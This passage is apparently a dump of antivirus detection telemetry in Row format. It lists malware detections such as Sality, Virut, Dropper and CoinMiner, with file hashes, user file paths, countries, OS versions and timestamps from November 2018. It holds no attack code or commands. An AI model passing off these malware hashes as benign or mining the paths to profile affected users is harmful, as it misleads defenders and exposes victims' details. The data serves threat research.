  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='ee6bd2c7800713d60c4b33af40878f886738a4423894b45a165f3b140992f57a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154743-83fcecef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_398e4407\\AVSCAN-20181102-154544-787D09AE\\AVSCAN-20181102-154743-83FCECEF', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174026-228e1c84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-173656-152C68E6\\AVSCAN-20181102-174026-228E1C84', filesize=704000, name='TR/BitCoinMiner.d3bc4d.#M1.#R1'), hash='d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:40:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instdemo.exe', filepath='C:\\Program Files\\Lenovo\\OneKey Optimizer\\bin\\InstDemo.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='cc60da7ff095f3c23898529ec2eb4997affe3d8d01d5d7525c204db1697b2f9b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:N4y78VTXKkW+ELgu.1', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T20:17:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1944000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='c0ad07b7fc978b78be317363678b53544cde3b57fae80b7c6cb019fd35d7c3ca', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T02:25:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered redol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered redol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a3cd24b89528caefdeb3fb22f11c6fc4c47deeb2c9cf2812b59294bd122c625c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:29:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='8e961c4d8fcf337f878cb82da2fce2f6a8d4b7b0c0487569537f17969067a03d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9b37cb2cf2da005513bb4a073cc0e715d7f2bb286ccadff0bdd82bb523b83294', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9B37CB2CF2DA005513BB4A073CC0E715D7F2BB286CCADFF0BDD82BB523B83294', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='9b37cb2cf2da005513bb4a073cc0e715d7f2bb286ccadff0bdd82bb523b83294', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084610-48d1a17b', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_aa89b06e\\AVSCAN-20181102-084004-0899908A\\AVSCAN-20181102-084610-48D1A17B', filesize=896000, name='Adware/CrossRider.mrhba.#M1.#R1'), hash='b725dfdb3755335affe6ea33419d5c08308b81a1d82818623958e961c3de1254', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winbox-2.2.18.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\winbox-2.2.18.exe', filesize=192000, name='W32/Sality.AG.#M1.#R1'), hash='b1884840ea6b92ac2134c8ac835a6bd64d096b80fa6cab37b8c91a804fccf9aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:26:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3139511224-2381403859-274640115-1002\\$RRM956E\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:02:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='american horror story 611 - chapter 11.mp4', filepath='g:\\séries en anglais\\american horror story (2011-)\\complete season 6\\american horror story 611 - chapter 11.mp4', filesize=251320000, name='HEUR/AGEN.1027786.#M1.#R1'), hash='aff39e4baf3f851ea788ccf8e7238df2784342fc04d4a9610d19971f919fecc0', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:05:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='заявка и анкета 2016 год.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка 2016 год\\Заявка и анкета 2016 год.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:51:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='system volume information.exe', filepath='F:\\System Volume Information\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00290c3a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290c3a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:40:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239c61', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239c61', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:48:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl18d.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl18D.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134511-2b42f9be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134511-2B42F9BE', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T18:02:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193857-265a94cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-193857-265A94CC', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:38:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl19f.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl19F.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-01-004627/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:26:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0010834.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0010834.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:37:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='I:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\OJWRYZIV\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=19360, timestamp='2018-11-04T14:43:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b116900bf58998f4fe2a52084bc92182715b67cf2fa3585d583464cf25919455', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B116900BF58998F4FE2A52084BC92182715B67CF2FA3585D583464CF25919455', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b116900bf58998f4fe2a52084bc92182715b67cf2fa3585d583464cf25919455', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:35:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214522-fd8ea9dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214522-FD8EA9DD', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:45:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsa1ED1.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T18:44:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cfp.exe', filepath='D:\\Amozesh\\AMOZESH HUAWEI\\برنامه مورد نیاز\\MIRACLE\\dmq5_miracle_box_2.27a_cracked-[asateam.ir]  by mahdi_roohi\\Miracle Box 2.27A Cracked-[narmafzarkar.ir]\\Miracle Box 2.27A Crac k by HiRSH GSM\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='dd5928d6a46fc44a1e0ad820a8c3242a181bc30bd84c972839ef3998ef8eeb85', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:14:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f9ff2c44c5e8487f1a23d5a3c3a9563f100a301438990bf0d168ee4a9c70743e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F9FF2C44C5E8487F1A23D5A3C3A9563F100A301438990BF0D168EE4A9C70743E', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='f9ff2c44c5e8487f1a23d5a3c3a9563f100a301438990bf0d168ee4a9c70743e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:02:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator WiseCare.exe', parentsize=684032, timestamp='2018-11-04T14:46:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='f4cc3eca8cdd26da06dcc3556a396864fc26045630c69cca2a579c95ddece541', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:31:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='f241c5fe912b94290df3a653e8307377511a911a3dd1dbd1769514e13dac4411', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mrsb.exe', filepath='\\\\?\\C:\\NAPRO\\PC-SCAN3000 USB\\AIRBAG\\MRSB.exe', filesize=2432000, name='HEUR/APC.#M1.#R1'), hash='fc515f3b119cbcf405c5b61d8497a7f953635dc71d66b8c65577837e505a46c5', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:49:19Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='flash_tool.exe', filepath='D:\\china\\SP_Flash_Tool_v5.1504_Win\\SP_Flash_Tool_5.1504\\flash_tool.exe', filesize=8320000, name='W32/Sality.AT.#M1.#R1'), hash='5a412a2588a0d51ce109aef669889763ab73e6f644595486c2c613f7bddbd0c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T20:03:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='weight&height.exe', filepath='F:\\DATA YANTI\\DATA\\Game Flash\\Weight&Height.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R3333'), hash='54061c9622c9f5eec6117da1d30cfc67ac8e9014215ba6e05073c7e8adc08772', metadata=Row(cmdline='-r', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security 10 for Windows\\avp.exe', parentsize=741360, timestamp='2018-11-02T06:40:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D2685E4ACE3FB52FB99BF29DD0892B348C2ED611A6C8221B3FE1DC9A3987612', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:29:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='play.exe', filepath='F:\\العاب\\Formila car\\Play.exe', filesize=832000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='5055563a85af1c46f43ebc410614c366dd95ffe9b813e70e25f36dcdf98f09b5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:05:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160144-f881c06e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160144-F881C06E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013301-26972f3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29031212\\AVSCAN-20181102-012241-F2AFFE1A\\AVSCAN-20181102-013301-26972F3D', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:33:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{06332CB9-78B5-49D8-A9B1-18CF5E84F1B7}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='14e1d424c84cb2c830a181196637b8888a1110e2928e3fa9e5b07f8c96931ff2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194855-52de57c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-194643-3B51EB47\\AVSCAN-20181102-194855-52DE57C4', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:48:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='زوم ســـــتار والاشباة.rar', filepath='\\?\\F:\\New folder (3)\\New folder\\18-1-2018\\New folder (2)\\دسك توب 17-11-2017\\14-11-2017\\ملفات جي اكس 11-2017\\احدث ملف قنوات عــــربى بتاريخ 10 11 2017 لاجهزة (Starbox srx150__ZOOMSTAR__Magicsat ms 9650)\\زوم ســـــتار والاشباة.rar', filesize=712000, name='TR/Dropper.Gen.#M300.#R2530'), hash='47d59aca63d5c7f504c0c58f3c499b1b12d7d784d114b9479f9b6b314d92e516', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:35:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3F81ED12CF783663ACE3F754BB552275736986B0A32BAD2F9B6B660428C149A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:20:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155722-dc1a9e96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155722-DC1A9E96', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='444ada65bfa80f9e4bffb00843807c514a821ed4c347c4d4b058558696f0bb86', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:03Z'), dt=datetime.date(2018, 11, 2)),
